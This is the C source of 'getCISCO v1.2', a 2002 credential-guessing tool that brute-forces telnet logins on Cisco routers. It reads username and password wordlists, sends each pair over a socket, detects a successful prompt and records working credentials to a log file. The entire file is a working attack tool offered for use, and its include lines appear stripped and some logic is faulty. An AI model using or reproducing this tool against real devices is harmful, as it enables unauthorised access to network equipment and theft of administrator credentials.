/* * getCISCO v1.2 (c) 2002 by ca0s / getREWTED labs * * ca0s@getrewted.com.ar * http://www.getrewted.com.ar * * Tool to guess valid login/password on a cisco router. */ #include #include #include #include #include #include #include #define PROGRAM "getCISCO" #define VERSION "v1.2" #define AUTHOR "ca0s / getREWTED labs" #define EMAIL "" #define WEB "http://www.getrewted.com.ar" #define DEFAULT_PORT 23 #define LINESIZE 100 #define CONNBUFF 1000 int tempsize; int sock_stat; struct sockaddr_in addr; struct hostent *hp; char *optarg; void usage(char *prgname) { printf("%s %s (c) 2002 by %s %s Usage: %s [-t HOST:PORT] [[-u LOGIN | -U FILE] [-p PASS | -P FILE] [-C FILE]] [-o FILE]\n", PROGRAM, VERSION, AUTHOR, EMAIL, prgname); printf("\nOptions:"); printf(" -t HOST[:PORT] HOST and PORT to connect to. (default PORT is 23) -u LOGIN login with LOGIN name. -p PASS use password PASS. -U FILE read login names from FILE. -P FILE read passwords from FILE. -C FILE read login and password from FILE. (use USER:PASS format) -o FILE write found login/password to FILE instead of stdout. Find the latest version of %s at %s\n", PROGRAM, WEB); exit(-1); } int banner(void) { printf("\n%s %s (c) 2002 by %s %s\n\n", PROGRAM, VERSION, AUTHOR, EMAIL); } void fail(char *message) { fprintf(stderr, "(!) error: %s\n", message); exit(-1); } int log_found(char *host, int port, char *user, char *pass, char *file) { FILE *fd; if ((fd = fopen(file, "a")) == NULL) { fail("unable to open the logfile."); } fprintf(fd, "Target -> [%s:%d]\n", host, port); if (strcmp(user, "nologin") != 0) { fprintf(fd, "Username: %s\n", user); } fprintf(fd, "Password: %s\n\n", pass); fclose(fd); } int enlace(char *host, int port, char *logging) { int err; if ((hp = gethostbyname(host)) == NULL) fail("failed to resolve host."); if ((sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { fail("error opening socket."); } addr.sin_family = PF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(host); if ((err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr))) < 0) { fail("error opening connection."); } if (logging == NULL) printf("* attemping connection to [%s:%d].\n", host, port); } int loginmode(char *logging) { char *input = malloc(CONNBUFF); while (read(sock_stat, input, CONNBUFF) > 0) { if(strstr(input,"ogin:") || strstr(input,"sername:")) { if (logging == NULL) printf("* login requested.\n"); return 1; } if(strstr(input,"assword:")) { if (logging == NULL) printf("* only password needed.\n"); return 0; } } memset(input, 0x00, CONNBUFF); } int sendlogin(char *user, char *pass, int mode, char *logging, char *host, int port) { char *input = malloc(CONNBUFF); if (mode == 1) { if (logging == NULL) printf("* sending [%s] and [%s].\n", user, pass); write(sock_stat, user, strlen(user)); write(sock_stat, "\r\n", 2); while(read(sock_stat, input, CONNBUFF) > 0) { if(strstr(input,"assword")) { memset(input, 0x00, CONNBUFF); break; } } write(sock_stat, pass, strlen(pass)); write(sock_stat, "\r\n", 2); } if (mode == 0) { if (logging == NULL) printf("* sending [%s].\n", pass); write(sock_stat, pass, strlen(pass)); write(sock_stat, "\r\n", 2); } sleep(5); while (read(sock_stat, input, CONNBUFF) > 0) { if (strstr(input,"ogin:") || strstr(input,"sername:")) { if (logging == NULL) printf("* authentication failed.\n"); memset(input, 0x00, CONNBUFF); return(0); } else if (strstr(input,"assword:")) { if (logging == NULL) printf("* authentication failed.\n"); memset(input, 0x00, CONNBUFF); return(0); } else if (strstr(input,">")) { if (logging == NULL) printf("* seems we are logged in.\n"); else log_found(host, port, user, pass, logging); memset(input, 0x00, CONNBUFF); printf("\n%s finished.\n", PROGRAM); exit(0); } else { if (logging == NULL) printf("* authentication failed.\n"); memset(input, 0x00, CONNBUFF); return(1); } } memset(input, 0x00, CONNBUFF); } int linescounter(FILE *fp) { int lines = 0, size = 0; char *line = malloc(LINESIZE); while (!feof(fp)) { if (fgets(line, LINESIZE, fp) != '\0') { if (line[0] != 0) { size += strlen(line); lines++; } } } rewind(fp); size++; tempsize = size; return lines; } void copytomem(char *ptr, FILE *fp) { char line[LINESIZE]; memset(line, 0x00, LINESIZE); while (!feof(fp)) { if (fgets(line, LINESIZE, fp) != NULL) { if (line[0] != 0) { if (line[strlen(line)-1] == '\n' || line[strlen(line)-1] == '\r') line[strlen(line)-1] = '\0'; memcpy(ptr, line, strlen(line)); ptr += strlen(line); *ptr = '\0'; ptr++; } } } fclose(fp); } char *get_next_value(char *value) { while (*value != '\0') value++; value++; return value; } char *get_next_pair(char *pair_ptr) { if (*pair_ptr != ':' || *pair_ptr != '\0') return pair_ptr; while (*pair_ptr != ':' || *pair_ptr != '\0') pair_ptr++; pair_ptr++; return pair_ptr; } int main(int argc, char *argv[]) { FILE *lfp, *pfp, *cfp, *ofp; char *target = NULL, *pairfile = NULL, *logfile = NULL, *pass = NULL, *passfile = NULL, *login = NULL, *temp, *loginfile = NULL, *login_ptr, *pass_ptr, *pair_ptr; int option, inc, incu, port, countlogin = 1, sizelogin = 0, countpass = 1, sizepass = 0, countpair = 1, sizepair = 0; if (argc < 3) usage(argv[0]); banner(); while ((option = getopt(argc, argv, "t:u:p:U:P:C:o:")) >= 0) { switch (option) { case 't': target = optarg; break; case 'u': login = optarg; break; case 'p': pass = optarg; break; case 'U': loginfile = optarg; break; case 'P': passfile = optarg; break; case 'C': pairfile = optarg; break; case 'o': logfile = optarg; break; default: usage(argv[0]); } } if (target == NULL) fail("option -t is needed."); else { if (strstr(target, ":") != NULL) { temp = target; while (*target != ':') target++; *target = '\0'; target++; port = atoi(target); target = temp; if (port < 1 || port > 65535) fail("port is out of range."); } else port = DEFAULT_PORT; } if (pairfile != NULL) if ((login != NULL) || (loginfile != NULL) || (pass != NULL) || (passfile != NULL)) fail("option -C can't be combined with -u -U -p -P."); if (pass == NULL) if (passfile == NULL) if (pairfile == NULL) fail("options -p or -P are needed."); if (login == NULL) if (loginfile == NULL) if (pairfile == NULL) { login = malloc(strlen("nologin")); memcpy(login, "nologin", strlen("nologin")); } if (logfile != NULL) { if ((ofp = fopen(logfile, "w")) == NULL) fail("unable to open the logfile."); fprintf(ofp, "%s %s (c) 2002 by %s %s\n\n", PROGRAM, VERSION, AUTHOR, EMAIL); fclose(ofp); } if (loginfile != NULL) { if ((lfp = fopen(loginfile, "r")) == NULL) fail("unable to open the logins file."); countlogin = linescounter(lfp); sizelogin = tempsize; if (countlogin == 0) fail("file for logins is empty."); login_ptr = malloc(sizelogin); copytomem(login_ptr, lfp); } else login_ptr = login; if (passfile != NULL) { if ((pfp = fopen(passfile, "r")) == NULL) fail("unable to open the passwords file."); countpass = linescounter(pfp); sizepass = tempsize; if (countpass == 0) fail("file for passwords is empty."); pass_ptr = malloc(sizepass); copytomem(pass_ptr, pfp); } else pass_ptr = pass; if (pairfile != NULL) { if ((cfp = fopen(pairfile, "r")) == NULL) fail("unable to open the login:password file."); countpair = linescounter(cfp); sizepair = tempsize; if (countpair == 0) fail("file for login:password is empty."); pair_ptr = malloc(sizepair); copytomem(pair_ptr, cfp); temp = pair_ptr; for (inc = 0; inc < countpair; inc++) { if (strstr(pair_ptr, ":")) { if (*pair_ptr == ':') fail("incorrect format of the login:password file."); while (*pair_ptr != ':') pair_ptr++; pair_ptr++; if (*pair_ptr == '\0') fail("incorrect format of the login:password file."); else { while (*pair_ptr != '\0') pair_ptr++; pair_ptr++; } } else fail("incorrect format of the login:password file."); } pair_ptr = temp; } if (pairfile != NULL) { enlace(target, port, logfile); if (loginmode(logfile)) { for (inc = 0; inc < countpair; inc++) { temp = pair_ptr; while (*pair_ptr != ':') pair_ptr++; *pair_ptr = '\0'; pair_ptr++; pass = pair_ptr; login = temp; if (sendlogin(login, pass, 1, logfile, target, port) == 1) enlace(target, port, logfile); while (*pair_ptr != '\0') pair_ptr++; pair_ptr++; } } else fail("only password needed."); } else { enlace(target, port, logfile); if (loginmode(logfile)) { if (!strcmp(login_ptr, "nologin")) fail("can't continue whitout a username."); pass = pass_ptr; for (incu = 0; incu < countlogin; incu++) { pass_ptr = pass; for (inc = 0; inc < countpass; inc++) { if (sendlogin(login_ptr, pass_ptr, 1, logfile, target, port) != 1) { temp = pass_ptr; pass_ptr = get_next_value(temp); } else { temp = pass_ptr; pass_ptr = get_next_value(temp); enlace(target, port, logfile); } } temp = login_ptr; login_ptr = get_next_value(temp); } } else { for (inc = 0; inc < countpass; inc++) { if (sendlogin("nologin", pass_ptr, 0, logfile, target, port) != 1) { temp = pass_ptr; pass_ptr = get_next_value(temp); } else { temp = pass_ptr; pass_ptr = get_next_value(temp); enlace(target, port, logfile); } } } } }